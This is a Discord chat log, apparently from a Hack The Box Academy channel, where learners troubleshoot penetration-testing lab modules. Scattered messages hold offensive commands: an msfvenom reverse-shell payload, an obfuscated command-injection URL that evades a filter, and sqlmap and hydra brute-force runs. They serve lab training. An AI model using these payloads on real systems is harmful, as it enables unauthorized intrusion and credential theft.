#modules
makes sense, thanks
praying helps you learn faster
3 days. A day is measured as 8 hours
so a 8h module is measured as 2.6 hours?
Bruh
24 hours is not enough
An 8h module is measured as 8h…
time must slow down to fit that ballpark
? That's not how math works
.
hello, im having trouble since packets dont reach the machine's IP and 10.10.14.1 responds that the hosts are unreachable, i have tried restarting the machines several times and it doesnt seem to work
So?
24 / 3 = 8
So?
so 8 /3 = 2.6
The day metric is defined as a working day
same thing
But why?
Not really
cuz he said a day is measured as 8 hours
It’s not the same thing, one is measured in days, one is measured in hours
ye
So not the same
exactly
Jfc
As in a day, for htb estimate, is 8 hours
Cant tell if you’re just trolling
Didn't think I'd need to elucidate the obvious
did the box tell you that?
shrink a day down to 8 hours
so you have 8 hours in a day
24 hours is 3 days
8 hours is not 2.3 hours
If you see a module listed as 8 hours, it’s 8 hours, if you see a module listed as 3 days, it’s 3x 8 hours
alr
It's literally convention
If you want to sit behind your screen for 24h, sure
When you say you worked a day, you don't say you worked 24 hours
You worked 8 hours of that day
will that make me pro hacker? xd
You don’t? My work weeks are 120 hours! Just like lolz
i couldnt imagine working that long..
No
lmao
ss
That’s not an ssh key
then what
That's a certificate like something used for ssl stuff
Then go back and enumerate with tom’s credentials
lolz is my alt btw
magnus carlsen can bend time
i found it and login imaps also
Admitting to having an alt: mods ban this man
why
Why do you have alts…
for personal use?
Whose use is the other acc then?
my PC
imaps and pop3s will give you the same key ID you enumerate the email
You don't need an alt for desktop and mobile g
its a way to transfer texts, files and others from my phone to my PC and vice versa
cant send shit myself
So find the correct thing in IMAPs
You know you can create your own private server yeah?
you'd be surprised how many i've seen that have this setup
i dont like that
i just need chat with myself
talking to myself
You can make a server where you post that in
And that's how you get involuntarily committed to an asylum
i found 1 file on inbox but i cannot find keys
Still no need for an alt
to what?
The email in the inbox has the answer
i have my own private server where i send stuff to transfer
are u mad that i have alt?
Nah, having an alt is just cringe
;x
Especially if it's for the purposes of being lazy
I'm actually stupid, ignore the message i send above wanting help, i got 2 aliases htb and htb_academy to connect to the vpns i was using the wrong one
ye
alts r the best
i've lost 1 hour of my life
there's definitely no need for an alt unless you need a separate one for work/school/whatever that isn't personal
i try to find it but no luck
If you were doing it for the sake of being a troll or fucking around that's different
Select the right inbox and it's there
it's ok i have an alt myself
you should have one as a matter of personal cleanliness
mf i have completely different servers im in and completely different people on both accounts, i can transfer stuff from servers and private servers im in for quick use
yah i see tom and his domain how to find more details
Yes, as that’s often a means of mute/ban evasion
You need to fetch a body[]
no
Yes
My brother in christ
yah wait i send it
You can sign in on your desktop
Anybody know how to fix the problem where xfreerdp isn't connecting in the pass the hash from windows section??
Single quotes, turn it off and on again
i like things harder
seems counterproductive
What single quotes
trust me its not
Are you using the right argument with xfreerdp
Yes
Iirc it's /h: or /pth:
No here password is provided
Ya this is the pass the ticket from windows
Yes: but you can't use the hash as the password with xfreerdp
It's a different argument for it than /p:
This is the chapter right after pass the hash one in that only hash given
result
Here we get the password to login via rdp but can't login
Password attacks, ptt
oh this is not right inbox am i right?
Oh yeah no, wrap the password in single quotes
It's the right inbox, otherwise it wouldn't have pulled email info
The all argument for fetch doesn't grab email contents
then what i miss?
^
okay should i follow more knowledge about it?
it helps to look up IMAP commands
If you search this channel for imap ive shared a link a while back
thanks buddy i got it... mwaahhh....
Very useful feature of discord
Marcie's already told you exactly what you need to do
but i recommend looking some commands
There's a reason I remember a lot of nuanced things
Because people ask the same damn things
is this platform watch from htb
?
A lot of these questions are answered in the official forums as well.
Most people don't know how to Google and have not seen the forums
Like straight up giving the answers :p
Yeah, they should include the links to the forums in the modules.
Eh
Would maybe make it less flooded in here with easy to answer questions
This channel's purpose is literally assistance with modules, no matter how simple/easy they are
i mean the modules literally say come to discord for help lol
i also think discord has become the norm for this kind of stuff
i haven't made a forum account in years
It's also faster to get an answer here than the forums
Yeah that's true. And I get why people ask in here. I just think they'll find better answers in the "startes" modules on the forums since there is sooo many questions and answers in there.
Though I swear @acoustic owl stalks the forums
Also so many forums where there's a non-answer or misleading answer
Or going far outside the scope of what's expected to answer
To be honest, I hang out more on Discord than on the forums
I just remember early on whenever I was searching the forums I'd see your name 
maybe in some of them. but the ones I have seen it's been pretty much to the point on a lot of the questions. I guess it depends on which modules etc etc
Yeah. Its mostly why I stopped using it
But also in the forum, it's better to be a bit more direct as it's much more asynchronous communication
Is anyone able to assist with the AD challenge 2?
you mean AD enum and attacks Skill Assessment 2?
Yes
Im on the sql01 box as mssqlexpress
with the creds I found previously
but dont see a way forward
Are you able to assist
Haven't finished this module
What question are you stuck on
You can likely find nudges using discord's search feature
hey there is a issue with mysql i try to find data bases but no luck
Are you closing your query with a ;
Hey again! Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I am on sql01 as mssqlexpress but I dont see anything here.
yes
Have you logged into mssql?
Yeahh I got a reverse shell from enable_xp_cmdshell. Also theres the 4 default databases I did not see an interesting one
Have you checked your privs?
Im a sysadmin
of course lol forgetting the basics

how to find mysql database details guys
follow the module
if it's not working. reset the target and try again
found it and miss some basics once i found htb user pass i will inform you.
rule 1: always read the section before asking questions
a good majority of the times you will be provided credentials to use
hey some issue with pass i found it and show error
dude i'm busy "some issue with pass and show error" isn't really descriptive
what error
i found password from users database but htb says it is not password
make sure there's no additional spaces before/after
thank you for valuable time and guides...
In bloodhound I see user CT059 has genericall over DA but the hint is stating I need to use responder but I used it in the beginning.
You can use it again
Well I used inveigh
Yeah thats what I was thinking it needs to be ran from a different computer
Hello, I don't understand why I can't get the right answer.
Linux Fundamentals/File Descriptors and Redirections
First question : How many files exist on the system that have the ".log" file extension?
locate *.log | wc -l
return 29
Right answer : 32 ! (I got it from BF ...)
How many total packages are installed on the target system?
dpkg --list | wc -l
return 748
748 is a wrong answer ...
Can someone please explain my mistakes? Thx
Hi everyone, I am working on the Windows module, the first chapter, I managed to find the executable requested by the first question but I cannot understand
The required response format
I found poqexec.exe as executable
there's several windows modules
true
Intro to Windows CLI; Windows Priv-Esc
Windows event finding evil
Yes
n0 81u3 f0r m3 😉
It asks me for the answer in the format: T_W_____.exe I don't understand what that means
ubuntu@WEB01:~$ chmod +x backupjob
ubuntu@WEB01:~$ ./backupjob
Segmentation fault (core dumped)
Pivoting, Tunneling and Portforwarding section, module "Meterpreter Tunneling & Port Forwarding"
Followed the module completely. Tried Pwnbox and own machine. I see others have had issues with this, but cant see any solutions
That initial bit is part of the answer
It's likely you used the wrong payload
Ran the command exactly as its written in the module msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost> -f elf -o backupjob LPORT=8080
I take it you substituted the ip for yours yeah?
For the former, I believe I used find instead of locate. My reasoning was that I didn't have sudo permission to run updatedb. I wonder if that will give you a different answer.
For the latter, I used apt list --installed, but I think the more pertinent thing would be that, if I recall, some lines sent to STDOUT are informational and not package names. I would check on that.
The <IPadressofattackhost> is meant to be substituted
Dpkg --list has a bunch of extra lines. And locate doesn't really show all sometimes. Find is a much better command to locate files usually
With dpkg --list you'll need to additionally grep for 'ii' (which is dpkg speak for "fully installed")
I mean, I obviously replaced it
I can never be too sure my dude
Thx
apt list --installed | wc -l doesn't work either
That returns 738 and it's wrong answer too 😦
It's written like this: T_W_____.exe
Yeah, but wc is just counting the lines returned. Some of the lines returned by apt list --installed are not package names. You either need to grep for what you're looking for or visually see how many lines lead the actual data and subtract that number.
Btw if you're trying to show format use backticks, discord is formatting it
Do apt list --installed | head -n 5 and you'll see why it's wrong
Like imagine apt list --installed returns
Okay boss here are some packages that you have installed. Here they are... package1 package2 [...]
Also it helps to run this on the target machine
That's how you get the expected answer
Also apt gives you a warning that its output is not clean WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
2 things, I didn't invite you to dm and I haven't done this module
Thanks
Please is there anyone who has worked on the windows event finding evil module?
Thanks for the nudges. PWNED
Congrats
Silly me !
apt list --installed | grep / | wc -l works fine !
Thx !
Thx @oblique tusk too
If you're not getting the expected answer: always walk back the command so you can see why its not working the way you want
Yes !
most tools as well will give you descriptive errors or at least some sort of thing to tell you why it failed
i.e. 'command not found' < self explanatory - you don't have the tool installed/the tool isn't in your PATH
okay worked with a stageless payload for some reason
MarcieLee, did you work your way through the whole pentesting learning path? How long do you think it took you if you did?
in the kerberos module rbcd from linux, using rbcd.py i get an error saying "msDS-AllowedToActOnBehalfOfOtherIdentity is empty", this means carole can't abuse this, right? are there other creds i'm supposed to use?
stuck on this because the command doesn't work
What is the difference between a "ffuf -w "wordlist" -u http://FUZZ.website.com/" scan and a "ffuf -w "wordlist" -u http://website.com/ -H 'HOST: 'http://FUZZ.website.com' scan?
Obviously with all caps on the FUZZ since it decided not to let me post it with all caps.
Hey there. I am stuck on the last two questions of this module. https://academy.hackthebox.com/module/112/section/1073 I have tried nmap and ssl into the imap. Not sure how to find the email
sorry, i mean not sure how to find the admin email address.
vhost fuzzing and subdomain fuzzing, but your syntax for vhost fuzzing is wrong, it should be -H "Host: FUZZ"
You're right about my syntax. I was just trying to figure out the difference between the two.
Also trying to determine if I should be using ffuf or wfuzz.
yeah so vhost fuzzing vs subdomain fuzzing
If you read the email, you can find the admin email
ffuf is faster and still being updated
Maybe I don't fully understand vhost vs subdomain
the way I logged in was as the robin user that was in the documentation. It said there were 0 emails
oh.... ok. Let me mess around. Thanks
Enumeration is key
you are very very good at this
I am on the last question wordpress skill assessment but when I place the web shell I get the following error --> Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
can someone ping me directly to provide clarification for this question please?
What question
can any of my senior help me out because am losing my question i feel it write but the input into the task is wrok
wut
i meant this "Can any of my seniors please assist me? I'm going crazy over this question; I think it's correct, but the exam is showing it incorrectly because of the input text "
question " What is the name of the network interface that MTU is set to 1500?"
send a link to the module
whatt link ?
are you taking an exam or doing modules?
this is the #modules channel
every module has a url.
Need some extra eyes if someone is able, am I missing something here? This is for the Command Injection Skills assessment. I have found the parameter to exploit, but no matter what I obfuscate, or encode I get the Malicious request detected ||/index.php?to=tmp%2F696212415.txt&from=696212415.txt%26%26b$@ash<<<$(b$@a$@s$@e64 -d<<<bHMgLWFsaA==)
&finish=1&move=1 ||.
tfw the kerberos ticket didn't wanna load for me to read the share >:(
I'll just say that when you execute this command (ifconfig),
ifconfig is deprecated by ip because of systemd
of course bling-bang-bang-born comes on as I get it working
(ip a) let me run this command
the song is a banger
wat song
i can't access my Pwnbox and i have subscription for Platiinum, which included unlimited Pwnbox usage.
why does the paths completed say 10 in the transcript but the website show 11 ?
hey guys want some tips for make notes for modules and ready for the exam. any cpts completed one?
can you help me with flag 9?
what module
Would someone mind having a look at my question above? I'd greatly appreciate it
post the url to the module
oh. i see. no documentation above it.
Need some extra eyes if someone is able, am I missing something here? This is for the Command Injection Skills assessment. I have found the parameter to exploit, but no matter what I obfuscate, or encode I get the Malicious request detected ||/index.php?to=tmp%2F696212415.txt&from=696212415.txt%26%26b$@ash<<<$(b$@a$@s$@e64 -d<<<bHMgLWFsaA==)
&finish=1&move=1 ||.
I don't remember what I did exactly but think dumber, also test for which characters are blacklisted so you know what to avoid
Yea, I am not quite sure how to tell , i'm not seeing the errors on the response to be able to test that
if you see malicious request detected then you're probably using a bad character
ya, that's indeed what i'm seeing
is anyone else having issues spawning their vm? my box won't spawn for kerberos module "Account Enumeration & Password Spraying with Kerberos"
any reason that my target isnt spawning on this network enumeration with nmap hard lab
And done..!! 
Thank you @fathom pendant @next bronze @placid edge @limber river
looks like i'm not the only one then.. server must be down
lmao crazy timing
Completed..!
Thank you everyone for the support to solve some crazy questions
That's a lot 💛
congrats
congrats bruh...
htb login issues any one face it?
been fine on my end
how i log this so terrible. how i report this?
using the support bubble
in the meantime try changing vpn regions ¯_(ツ)_/¯
if you're logged in*
if you're having trouble logging in; try clearing your browser cache
and disabling adblock
this link i access lastly
for support him
this link
no previous one
i am not complete this module
I resolved the issue and completed the module. ** Note to self, don't always assume you're injecting in the correct parameter even if you get the Error, try other parameters and get things quickly lol!
Alright I'm really stuck on the File Inclusion skills assessment, I don't want to say too much to not spoil most of the assessment. But I'm trying to ||poison the log|| and I am having zero success and I can't figure out why this isn't working.
Edit: Nevermind restarting the target solved the issue
What do you guys use for transferring files from host to Pwnbox with RDP session inside it? I don’t think http server work so
you can use smb server
its the same module as r3dph30n1x#7788 can someone help me none of the smb or ftp methods are working to transfer the file
what module?
file transfer module in the windows file transfer methods
They have no communication in between so
everytime i try to transfer the files from my host to the target by using the target's powershell it says nothing is found
I’m in a different module not the file transfer module
yes you can
so the rest of the methods dont work?
i tried to ping my host from the target's powershell and there is no connection why
what error are you facing with smb / http?
did you authenticate to the smb server?
no ill try but the ftp transfer isnt working either
if you're using xfreerdp, you can use /drive:/path/to/whereever and it will mount your folder
create an smb server with a username and password.
I think this method gets covered later in the module.
you have to Ensure that the upload_win.zip file is actually present in the share directory on your pwnbox machine
what if the command is this sudo impacket-smbserver share -smb2support /tmp/smbshare
is the file in the smbshare directory?
would you look at that it does
create the dir here then /tmp/smbshare
ok i dont have the dir b4
and copy the zip file there.
remove the n :
do we use copy
can you ping the windows box?
Nvm.
bruh your share name is wrong
smbshare not share
in my windows session or linux
the sharename is share isnt it
you should be able to view the contents now
dir \\10.0.2.15\smbshare\
windows
yes but he created smbshare on the linux box
its not working
the 1st image
yea i think the name of the share is "share"
really?
How did you name it on your kali machine ?
the first argument without - dictates the share name
I get that but if his command was
```
sudo impacket-smbserver share -smb2support /tmp/smbshare
```
wouldnt smbshare be the name?
share is the shareName, and /tmp/smbshare is the sharePath
positional arguments in argparse
oh I see.
Thanks for pointing that out
you got it?
no its stil not working
first make sure the windows target can ping your ip
run ipconfig in windows, send the output
df
looks like firewall
yea i tried with my actual OS and it was the same thing
^
yea im trying i think i disconnected the xfreerdp session by accident
nvm lab expired
use the vpn interface
tun0
yeah that should do it
And using the share too?
I have always been renaming my share name so I got it confused lol
If you didn’t reset your vm, you were using the wrong ip all along
10.0.2.15 instead of 10.10.14.86
i forgot to use tun let me see if it works now
ah yeah I always just use $(pwd) or . so that the share opens in the current dir
OMG IT WORKS YES THnks
👍🏼
ty so much guys/girls helps a lot
👍
Always make sure you use the right ip
yeah, I have seen something like that from Ippsec ^
How do I go about this guys?
You can use SMB shares to transfer files. Easiest thing you could do is enable the drive setting in xfreerdp which makes it very easy to transfer files
This can be done even if host and the rdp sessioned host doesn’t have any communication?
nope
if there's no communication then you won't get rdp either
is it something related to pivoting?
So, the file is in my main host and I’m running pwnbox thru which I’m RDPing to another host. I want to get the files from main host >> RDP’ed host
Nah this is intro modules so no pivoting yet
use the techniques from the file transfers module
it wouldn't be that hard, additionally, look into the manual of xfreerdp or whatever tool you use for the RDP
This module I haven’t reached yet I’m in prerequisite module
then there should be a connection if its not pivoting and intro module@crimson moon
main host like your own pc? pwnbox has internet access so whatever you have in your own pc, pwnbox can be used to download it
Yes own pc. So you mean pc>>pwnbox>>RDP host?
Just get whatever you want on pwnbox
If you’re working from your own pc you might as well leave pwnbox out and just use your own vm and use the vpn🤷🏼♂️
I will give it a big try
ive been pinged
lol, congrats on completing the path!
Hey guys is it just me or have the SSH and RDP machine become incredibly slow and unstable?
Hey do HTB offers path completion certificate kind of thing ????
If so how can I have it?
RDP half of the time only launches on a black screen for me. When it works after multiple tries its unbelievably slow.
SSH is more stable but slow as well.
You get a badge when completing the path
Black screen is a screensaver… press enter
That I got but certificate kind of thing?????
Not as far as I know

pass cpts and you get a cert
Many have perished before you
but hey you get one from cpts lol
That makes me feel a little better....
😄
Any secret tips for the slowness of ssh and rdp?
and a cool little sword ^
I haven’t really had issues with it personally
pick a server closest to you
The issue might be your own connection
46 ms
I am on a 100 ~ 200 and I don't face this issue
nvm that was pwn box, not sure can I test it from my own VM?
ping the target ip
14 ms
It could also just be me being spoiled and always having instant feedback.
Already happy that the black screen will not be a problem anymore
I mean there will always be some latency with rdp, but I haven't really run into it being unusable
My biggest annoyance is when I hit backspace and it takes 3-5 secs for it to actually do that.
try switching vpn servers i guess, but if it shows <100ms I don't see how it's doing that
Thanks will try, Thank you everybody for the help ❤️
Need to grid for that 😅
Hello everyone,
I would like to ask for you help in module "Web Requests" in CRUD API section..
I tried to follow the instructions to obtain the flag but when I try to update the name of any city to update with the name "flag" the update command doesn't seem to work although the code seems to be accepted by the terminal ..
Do you have any suggestions about this?
The command that I'm using is the following (for example) :
curl -X PATCH http://83.136.252.214:51966/api.php/city/london -d '{"city_name" :"flag"}' -H 'Content-Type: application/json'
After the above update when I try to display the result it seems that the update didnt happen at all..
Thanks in advance! Have a great week!
Module : ADVANCED XSS AND CSRF EXPLOITATION
Section : Bypassing CSRF Tokens via CORS Misconfigurations
I am working on the question at the end of the section. I used the payload shown in the section with a minor change of the element id from csrf to csrf_token.
But i dont see any token for admin in the /log
Also tried few times of restart the lab
Need some assistance please
should use put instead of patch no?
or maybe im mixing them
I've tried this as well and still have the same issue..
Fyi, I choose to use patch at first because the task says to update only the city_name
seems weird that url you have
api.php/city/london
sure its not api.php?city=london
or whatnot
I was following the module's examples that's why I used that syntax.
I will try your suggestion and I will inform. 🙏
footprinting - hard
hi can anybody help me im stuck at the initial stage of the lab
i cant find the snmp running on the target
link ?
did you look for every port ?
nope it took too long for me like it was none stop or using your own vm faster?
is it linux or windows ?
what are you referring to
the "victim"
windows i assume didnt really take note
you should, enum everything
what can i even do with the os?
understand what you do
how to enum right
if you do not know what you are dealing with, you can't hack it
was told there id snmp running on the target but the normal ports 161,162 showed its close so i cant communicate with it
tcp or udp ?
for the snmp?
yes
udp
I can't even complete modules this morning because the SSH and RDP connections keep crashing
there was ssh and imap pop3
u need credentials dont u?
or maybe restart server ... sometimes it hangs
i did this module some time ago tbh
i switch between like 3 vpn alr
yea did that as well
Oh that one. I remember this one. Where are you stuck?
I will say that snmp is definitely the answer on that one
Hey guys.
I have a question about an SSRF question in the Web Service & API Attacks module:
The question is the following:
The payload consists of a base64 encoded url, when trying to access 127.0.0.1:3002 the connection is open and nothing happens.
As he asks to identify, I believe I am missing something.
I thought about serving an index file on my machine and making the request for it but I don't really know how to set up the index since I don't have access to the technology running on the server...
anyone to help?
On the Module Password Attacks there is a section called password mutation and im stuck on the assessment here is the question "Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer." Basically the things i have done are:
Create a mutated list with this command "hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list"
Brute force ssh using this command " hydra -l sam -P mut_password.list ssh://10.129.151.233"
I also Tried Brute forcing FTP. Still no luck can anyone give a guide here?
That section teaches you patience xd
Check the word count of the mutated wordlist; it should be around 94k words.
Remove first 20000 or 30000
Things will be little easier
Hi guys, I'm currently on "Windows Attack and Defense | Kerberoasting" but I can't ssh or rdp to the kali vm. I've tried following the instructions on the previous page but it gives me a certificate verification failure (self signed certificate). Any advice?
does it ask you to connect anyway
No
oh that's right
you don't connect to the kali vm on that section
you connect to ws001
No?
see at the bottom of the page it asks you to rdp using bob's credentials
you probably can ssh into kali from ws001 but i didn't do that
i just cracked the hash on my own vm
Guys quick question, i just elevated my privs to local admin group. running "net localgroup administrator" i see my account there. but somehow when i try to access admin folder doesnt work... logged out and back in of RDP still nothing, ran gpupdate /force also and same thing.. What step am i missing?
Not sure what module you are on.
Last one
Lateral Movement Attacking Enterprise Networks
Everytime i try to access the admin folder to get the flag over the desktop i get an access denied
what host are you on?
MS01
I think the problem i have is that everytime i try to open an elevated pshell it tries to log in as a domain joined user, which i'm not..
Haha got it
hey
i tried your suggestion but nothing seems to change, it accepts the syntax but still it doesn't apply the update for some reason... But when i try to insert a new data (instead of update) using POST , the command works just fine... Thank you for your suggestion though. :))
keep the url as you had
use PUT instead of PATCH
should you be passing in a country_name also?
This time it accepted the PUT input, and the update was successful! Thank you!! I updated only the city name because the task says "First, try to update any city's name to be 'flag'.[...]"
cool
Is it correct that I can use my APP vip OpenVPN for Academy also? It's seems to work fine?
what do u do when u run out of modules?
wait
for what
new modules
i was about to ask when's the first insane module but that's not a difficulty..
what do u do when there are no more modules
i would probably do some boxes
i think the challenges part of the website is so slept on tbh
can get really creative if u want to
a lot of the challenge categories i have no experience in
in terms of exercises it's good to practice approaching and modeling problems in a manna thatz complimentary to unique problem sets
if they are easy u can get the experience with some experimentation and a few F5
you have a point
i am about to run out of modules
i just have a hard time figuring out where to start
might study basketweaving next. seen some cool stuff people can make.
if i ever run out of content.. might just go back to doom modding
you guys should get into bin exp, that's what all the cool kids do these days
pwn college is p good
do you do any pwnables?
i just completed the assembly module so it's a plausible path to take
yh i was active on pwnable.kr
but i'm taking the soc path so i gotta do malware analysis
is the heap content on pwn.college good?
idk i just like the way it is structured and welcoming.
y u in this discord but not that 1?
idk you can invite me and ill join lol
tell me more about VR
got the tip! and finally solved the task. Thanks again!! 🙏
what trainings are good for VR and pwn ?
I play ctfs with my work colleagues sometimes
do u kno thegrugq
At work it's mostly web exploitation but I have recently been assigned to do some kernel research
is he the twitter guy? maybe?
anyway this is tha modules channel
are there any pwn modules u know about?
i did the binex ones and am finishing game reversing
but outside of that i'm not sure?
well what do you know about pwn? I usually separate it by rop/kernel/heap
how good are you at each section
yes kernel stuff is cool but you need rop knowledge first
oh? is that like alphabet soup but for memory?
idk what you mean
Return-Oriented Programming
alphabet soup is a random assortment of small pasta formed in the shape of alphabet characters and consumers make a game of rearranging it into comprehensible words
i would suggest focusing on rop until you understand it well. look at all stack protections and understand how canary, nx, pie, relro all work. practice buffer overflow with ret2shellcode, ret2win and then do ret2libc. Learn about leaking addresses via f-strings and how to overwrite memory such as GOT.
After this focus on statically compiled binaries where there is no libc, use the syscall gadget to pop a shell. then look at srop techniques for when there are lack of gadgets to populate a execve syscall
Hey guys im losing my mind in the last module of enterprise. need to sync my kali with DC01 via proxychains, tried plenty of tools but everytime i get server not eligible with ntpdate...
um where is the module for it
idk i dont do hackthebox 🤣
why are u here
i played a htb ctf
am i not allowed to be here ? i was being helpful ...
no i was wondering if u dont do that why would u visit
I got the port but it seems not to work, when I use it. can you please give a hint? I'm not sure if i got the right IP
i did this if u get stuck. there's a debugging section that trips people up with the sandbox checking
i haven't tried it. i think they have cool hoodies tho? or a shirt? something like that
i'll keep that in mind
Try tool ligolo
It is internal
im stuck on password attacks module under pass the hash from linux section in the last question before the optional exercises where should i be looking for linux01 kerberos ticket exactly i have used all the ones in the tmp file and got nothing
find the keytab files
i think i got it
Im working on the Advanced XSS and CSRF CORS misconfiguration module. Can someone DM me? Im not sure I understand what the challenge is expecting
any help for MODERN WEB EXPLOITATION TECHNIQUES Skills Assessment?
admin password and ssrf
Take a closer look at the ||HTML elements||
can I DM you? I have what I think is going to exfil what I want. I just cant get it to do what I need it to do
wait nvm.
sure
nvm, I managed to get it to work. user error
Hey lads, I do have a problem regarding https://academy.hackthebox.com/module/77/ on section Public Exploits, I just obtained the flag however the HTB academy platform does not seem to accept the flag, any thoughts?
maybe try manually typing instead of pasting
Hello, can somebody tell me what the glibc version is in the module Linux Privilege Escalation Shared Object Hijacking ? I have now tried so many versions because the one on the machine is/are not working. Edit: Solved it (Had a Space somewhere)! This module is just trash.
found it. that was easy. the problem was for the box. one special request did not generate and send from the app
No luck on that unfortunately 😦
Tried to reset the machine and perform it again, the flag is still the same however HTB does not accept it
carefully read the question, emphasize on the path of the file
so im doing the footprinting module, on ODAT.
i installed ODAT but getting this
i even chmod +x the py files
Hi guys 🙂 As I'm doing the cwee path I'm keeping on adding scripts for tedious attacks here: https://github.com/nirzaaa/cweeScripts
Would be happy to share with you if might help, you can dm me for feedback if would like too of course
Really cool and appreciated it
Thank you very much for the kind words, very important to me to give back to the community. Tried to add comments and explanations too to make it easier for people who following too the cwee path with scripts that will help them along the way❤️
||I did that, my understanding is that we should locate the flag on the system through cmd and cat the flag, I received it, not sure if something else should be done besides that ||
if youd like you can DM me what youre trying to submit and I can verify if its correct
Since Ive loooooong since completed that module
just @ me if you do I dont get new message notifications
is anyone on ACTIVE DIRECTORY ENUMERATION & ATTACKS not able to rdp? given just a black screen?
Sure, thank you so much in advance!
Press enter.
Can anyone help me out with the Secure Coding 101: Skills Assessment for the Patch section? Im just at a loss at what I am supposed to sanitize. I have tried to sanitize a bunch of different stuff but nothing's worked yet
Hacking Wordpress
Directory Indexing
I have tried many things to reach the directory that includes the flag including trying the plugins that are available. If anyone can help I would appreciate it
Look in the directory as explained in the module.
i used c# and took advantage of harmony in bepinex to write a prefix patch that sets drm to 0 but i'm curious how you did this with dnspy
try xfreerdp /v:ip:port /u:user /p:pass /dynamic-resolution
hey guys, I'm such a noob and am stuck in Using Web Proxies module, can someone help me? I'm trying to find the damn flag using burp intruder, the question goes like "Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.", I've set the payload option to .html, the grep - match to 200 OK and the position is "GET /§admin§/ HTTP/1.1..." but whenever I start attack, it gives me a 403 status for the .html file. What am I doing wrong?
Thank you both @autumn pilot and @thorn urchin. Managed to solve the lab I made a very stupid mistake
spoiler: make sure yall attacking YOUR lab 😛
Nothing seems to work
your setting there would be replacing the admin in the url, not actually testing for files under the directory
Good afternoon. I'm stuck and need some help on SQLMap Essentials - Attack Tuning : What's the contents of table flag5? (Case #5)
I've dumped a flag from the flag5 table but it's not accepted. I've checked it for whitespaces and I've tried everything from this lesson to see if another flag is found but all I can find is the same incorrect flag.
Here's what I ran: ||sqlmap -u http://$target/case5.php?id=1 --no-cast --dump --level=5 -T flag5 -C id,content --risk=3 --batch||
Here's the last piece of the flag I keep getting: ||w0r7h_17||
I tried to be more explicit in my command is the reason I added the -C switch with id and content. It really didn't do anything. I've tried other syntax variations with the -a switch but it didn't change my result either. I'm lost in the sauce lol
I was having lots of issues with that question, eventually just restarting the target and running my exact same command again worked and I got the flag
https://academy.hackthebox.com/module/145/section/1298
i really dont get this module
im stuck cant get rce i found another port with ffuf :5000 other then that im in a dead end
I'm having this issue with Antak Webshell in the Shells & Payloads module.
I followed the "guide" in the module and I'm supposed to get a Powershell window and I get met by the error page. I've tried to reset the ip etc. but with no luck. Can anyone nudge me in the right direction? Thanks!
If someone encounters this error, there is an easy fix for it. In Remmina configure the TLS Security Level on 0 -- Windows 7 compatible
I've dumped three different flags - none of them have been correct lol
can i get a nudge for the foothold medium lab. im enumerating and feel like im in the right dir but not sure
Where are you stuck at?
Module:NTLM Relay Attacks
Question Skills Assessment:Compromise BACKUP01 and then submit the flag located at 'C:\Users\Administrator\Desktop\flag.txt'
Hi can anyone give a hint im stuck here
||ive mounted the NFS but am not finding anything in the text files as of yet. the only other options would be to BF rdp and SMB||
you don't need to check every file
You're on the right track. You'll find the hint where you're at now.
most of them are infact empty
you still alive🤯
there.is.so.many.files
If only you could see the forest for the trees
hehehehe
why do i make things harder than they are
i wayyyy overthought what i need to do in medium
am i supposed to get this error
Did you figure it out? That part was painful
not yet ||i found both a local and remote db but the sa pw doesnt work and crackstation wont crack it||
So you don't use it there
||my only guess is smtp, but the smtp server wont ping||
Right click and run as administrator
i quit
Don't quit
like im off my game today 
||You don't enter sa and the password into the program itself. You right click the program and run it as administrator. It'll ask you for the password you found from important.txt.||
yeah thats why i said i quit
it was way overthought
Oh right. It took me like 45 mins of fumbling around and getting angry before I got it
yeah its one of those **its not this easy it cant be this easy what the frick its actually this easy**
I found medium harder than the hard lab personally
But mostly because of the frustrations at that last part
Hello @rustic sage I am stuck at the same point..I did try to AXFR all subdomains but no help. Could you provide any pointers?
Where are you stuck at?
you still need to specify the nameserver with dig
but also bruteforcing is the solution
there's a handy tool provided by the section
the answer will be a subdomain of a subdomain
made that WAY harder than need be
yeah you need to find a tool that helps with the enum
Hi, I am working on the limited file uploads module. When i upload a svg file nothing is rendered in the page including the upload button, i then tried creating the svg with an online converter and that just echo'd the payload within the image.
Any help would be appreciated.
yeah this is one of those over thinking moments lol. which is insane because all signs point the opposite 
Hello, I have found also subdomains of subdomains but none of them ends with 'x.x.x.203'
then you're looking in the wrong place
it's gonna be a subdomain you can't just axfr to
do your initial subdomain enumeration of the base domain [inlanefreight.htb] and compile your list of subdomains to check from that
this is why the bruteforce tool is showcased
Remember the question where you were asked how many zones there were? You have to enumerate those zones for subdomains
The .203 isn't in either of those zones
Oh that's from like 40 mins ago lol
I could've sworn it was in the second zone but it's been awhile
Ah, right. I remember having a lot of issues with that particular lab
any ideas why proxychains curl http://172.16.5.135:80 works but proxychains firefox cant reach the webserver?
i did, i cant reach the http://172.16.5.135:80
Also you don't need to specify port 80
It's likely you might have skipped a step
Also try commenting out the other conf line
randomly worked now.. Weird
Hello, thanks for the answer but I tried now several SecLists to brute force but to no avail...and note these are very large files, it takes time to brute force and the connection over VPN / in-browser is sometime very unstable.
Listen carefully: you're meant to bruteforce a subdomain.
The list given in the example works
If you use that tool in your initial enumeration, you WILL miss the subdomain that leads you to the answer
Ah I see...now the problem comes up that the SecLists contains now just single words but xxx.yyy . So bruteforcing tries it with . (dots) which might lead you to think it tries subdomains as well. Thanks for the 'subdomain' pointer I will try it again later this week
No. The list should generally contain single words, you can specify a subdomain in the tool
I.e. subdomain.inlanefreight.htb
The tool then checks [list].subdomain.inlanefreight.htb
I am going to be so happy when I am done with the AD Enum & Attacks module...
It's tedious for sure
The foothold PC on the Shells & Payloads live engagement is so painfully slow
Are you actually using the right tool to brute force the subdomains?
Because if you’re not using the tool, you will not find the subdomain
Am I wrong in thinking that the way to get into the ||mysql account is via .ssh||
I am on the module Attack Common Applications, and I'm stuck on the Thick Client Applications in regards to Restart-Oracle.exe. No matter what I try and execute, or delete from the bat file in tmp, I don't end up with a restart-service.exe.. even if I run the monta.ps1 manually
It’s probs one o the most important modules tho right?
